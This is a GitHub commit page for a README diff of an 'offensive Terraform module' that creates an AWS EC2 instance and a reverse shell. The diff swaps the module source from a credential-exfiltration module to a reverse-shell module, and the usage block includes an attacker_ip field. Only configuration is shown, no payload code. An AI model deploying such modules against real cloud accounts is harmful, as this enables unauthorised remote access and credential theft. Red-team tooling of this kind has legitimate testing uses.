We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent cfc1251 commit 1a8cb20Copy full SHA for 1a8cb20
README.md
@@ -11,7 +11,7 @@ Offensive Terraform module which creates EC2 instance and reverse shell from an
11
## Usage
12
```
13
module "ec2_instance_credential_exfiltration" {
14
- source = "offensive-terraform/ec2-instance-credential-exfiltration/aws"
+ source = "offensive-terraform/ec2-instance-reverse-shell/aws"
15
16
subnet_id = "subnet-0a4a1cc04"
17
attacker_ip = "0.0.0.0"
0 commit comments